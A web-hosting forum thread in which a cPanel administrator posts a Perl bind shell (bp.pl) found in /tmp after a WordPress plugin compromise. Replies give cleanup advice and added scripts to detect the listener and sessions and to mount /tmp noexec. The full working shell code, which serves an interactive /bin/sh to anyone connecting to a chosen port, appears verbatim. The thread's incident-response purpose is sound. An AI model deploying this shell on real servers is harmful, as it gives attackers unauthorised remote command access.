bp.pl in /tmp folder
Hi,
I run a cpanel server and host a few customers.
I noticed the following bp.pl file in the /tmp folder today:
#!/usr/bin/perl
# Bind shell: listens on the TCP port given as the first argument and hands
# every accepted connection an interactive /bin/sh.
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
# Bind to the requested port on all interfaces and queue up to 3 connections.
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
    accept(CONN,S);
    if(!($pid=fork)) {
        die "Cannot fork" if (!defined $pid);
        # Child: point stdin/stdout/stderr at the socket, then replace
        # itself with the shell so the remote side gets a prompt.
        open STDIN,"<&CONN";
        open STDOUT,">&CONN";
        open STDERR,">&CONN";
        exec $SHELL || die print CONN "Cant execute $SHELL\n";
        close CONN;
        exit 0;
    }
}
Seems to be some kind of shell.
I tried an lmd scan of the user owning the bp.pl file and observed that he was hacked through his plugin.
I have suspended the user now and contacted him.
What is this shell? What else should I do now?
Thanks for all your time.
Comments
This may help http://0xa.li/some-interesting-malicious-php-files/
Thanks for help @alegeek
I observed the date of the PHP shell script in the WP plugin folder and the date of the bp.pl file, and both of them are the same (today).
What else can I check? Is it possible to see if the bp.pl file is still getting any connections?
ps faux
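Following on from the ps faux suggestion, here is an added example (not from the thread) of filtering ps and ss output for the signature of this particular bind shell: a perl process whose last argument is a bare port number, a LISTEN socket owned by perl, and established sessions on that port, which is what "still getting connections" looks like on the box. The ps and ss listings below are constructed samples; the PIDs, ports and addresses in them are made up.

```shell
#!/bin/sh
# Added triage helper, not part of the thread: find the bp.pl bind shell in
# process and socket listings.  Each function reads listing text on stdin so it
# can be fed live output ("ps faux | find_perl_bind_shells", "ss -tnp | ...")
# or saved output when working offline.

# Perl processes whose last argument is a bare port number, as bp.pl expects.
# Prints: PID USER <command line from the perl token onward>.
# ps faux columns: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND; the
# forest view prefixes COMMAND with "\_", so the command is located by pattern
# rather than by field number.
find_perl_bind_shells() {
    awk '/perl/ && $NF ~ /^[0-9]+$/ && $NF <= 65535 &&
         match($0, /[^ ]*perl[^ ]* .*$/) { print $2, $1, substr($0, RSTART) }'
}

# LISTEN sockets owned by a perl process, from "ss -tnp" output
# (State Recv-Q Send-Q Local:Port Peer:Port Process).  For a listening socket
# Send-Q is the accept backlog; bp.pl calls listen(S,3), so 3 is what to expect.
find_perl_listeners() {
    awk '$1 == "LISTEN" && $NF ~ /"perl"/ { print $4, $3, $NF }'
}

# Established sessions on local port $1: each one is a forked child of bp.pl
# running /bin/sh with the socket as fds 0, 1 and 2.
active_sessions_on_port() {
    awk -v p=":$1\$" '$1 == "ESTAB" && $4 ~ p { print $5, $NF }'
}

# Constructed sample listings (made-up PIDs, ports and addresses).
SAMPLE_PS='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  19232  1500 ?        Ss   10:01   0:01 /sbin/init
nobody    4321  0.0  0.2  12344  2100 ?        S    11:30   0:00 /usr/bin/perl /tmp/bp.pl 4444
nobody    4390  0.0  0.1   4628   800 ?        S    11:42   0:00  \_ /bin/sh -i
user1     4500  0.0  0.3  45000  5200 ?        S    11:31   0:00 /usr/bin/php-cgi'

SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN 0      3      0.0.0.0:4444        0.0.0.0:*          users:(("perl",pid=4321,fd=3))
ESTAB  0      0      10.0.0.5:4444       203.0.113.7:51522  users:(("sh",pid=4390,fd=2),("sh",pid=4390,fd=1),("sh",pid=4390,fd=0))
ESTAB  0      0      10.0.0.5:22         198.51.100.9:40122 users:(("sshd",pid=900,fd=4))'

printf '%s\n' "$SAMPLE_PS" | find_perl_bind_shells
printf '%s\n' "$SAMPLE_SS" | find_perl_listeners
printf '%s\n' "$SAMPLE_SS" | active_sessions_on_port 4444
```

On the live server run `ps faux | find_perl_bind_shells` and `ss -tnp | find_perl_listeners`, then feed the port you find to `active_sessions_on_port`; the peer address of any ESTAB line is the attacker's source, and the sh PID on that line is the session to kill along with the listener. Note that once the perl parent is killed, already-accepted shells keep running until their PIDs are killed too.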
Delete file, inform user to remove or update plugin.
@jarland thanks. I already did that.
And also secure the /tmp and /var/tmp folders.
My servers got hacked and they used a bitcoin mining script, and the issue was that they had uploaded the script to the /tmp folder and managed to start it.
Read more here...
Thanks all for the valuable inputs. I'm going through them.
Maldet may be able to detect these types of scripts
https://www.rfxn.com/projects/linux-malware-detect/
Lock down that tmp folder! Definitely a shell of some sort. The tmp should have limited access from the get go.
LMD is already installed. I'm reading up on mounting /tmp with noexec on an OpenVZ VPS.
@oneilonline Should /tmp be set to noexec, or is there a better way to lock it down?
On my servers I mount /tmp and /var/tmp as tmpfs with flags noexec, nosuid, nodev. This should improve security. I believe that the noexec flag will require a pre-invoke remount setting for apt-get if you use debian derivatives, so that it can work correctly.
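As an added example of the setup described in the post above (not from the thread and not any distribution's own tooling): the fstab lines for tmpfs /tmp and /var/tmp with noexec,nosuid,nodev, the apt hook that lifts noexec around package installs, and a check against /proc/mounts that the flags are really in effect. The size limit, the hook file name and the sample /proc/mounts lines are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not from the thread: emit the tmpfs entries and apt hook for a
# hardened /tmp and /var/tmp, and check a /proc/mounts listing for the flags.
# The mount sizes and the sample /proc/mounts lines are assumptions.

# One /etc/fstab line: tmpfs at $1, capped at $2, with noexec,nosuid,nodev.
tmpfs_fstab_line() {
    printf 'tmpfs %s tmpfs defaults,noexec,nosuid,nodev,size=%s 0 0\n' "$1" "$2"
}

# Contents for a file under /etc/apt/apt.conf.d/ (Debian derivatives): some
# package installs need to execute something under /tmp, so exec is restored
# before dpkg runs and noexec put back afterwards.
apt_tmp_hook() {
    cat <<'EOF'
DPkg::Pre-Invoke  { "mount -o remount,exec /tmp"; };
DPkg::Post-Invoke { "mount -o remount,noexec /tmp"; };
EOF
}

# Read /proc/mounts text on stdin; return 0 only if the last entry for mount
# point $1 carries all of noexec, nosuid and nodev (field 4 is the option list).
mount_is_hardened() {
    awk -v mp="$1" '
        $2 == mp {
            split("", seen)
            n = split($4, opts, ",")
            for (i = 1; i <= n; i++) seen[opts[i]] = 1
            ok = (seen["noexec"] && seen["nosuid"] && seen["nodev"])
        }
        END { exit !ok }'
}

# Constructed /proc/mounts sample: /tmp hardened, /var/tmp not yet.
SAMPLE_MOUNTS='/dev/vda1 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime,size=524288k 0 0
tmpfs /var/tmp tmpfs rw,relatime,size=524288k 0 0'

tmpfs_fstab_line /tmp 512M
tmpfs_fstab_line /var/tmp 512M
apt_tmp_hook
for mp in /tmp /var/tmp; do
    if printf '%s\n' "$SAMPLE_MOUNTS" | mount_is_hardened "$mp"; then
        echo "$mp: noexec,nosuid,nodev in effect"
    else
        echo "$mp: NOT hardened"
    fi
done
```

After adding the fstab lines, `mount -o remount /tmp` (or a reboot) applies them, and `mount_is_hardened /tmp < /proc/mounts` confirms the result on the real system. One caveat worth keeping in mind for this thread's bp.pl specifically: noexec stops `/tmp/bp.pl 4444` from running directly, but not `perl /tmp/bp.pl 4444`, because the program being executed is /usr/bin/perl and the script is only read as data. The flags raise the bar for dropped binaries and setuid tricks; they do not by themselves stop interpreted scripts, which is why cleaning up the vulnerable plugin still matters.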
Beat me to it...Yes, exactly as mentioned.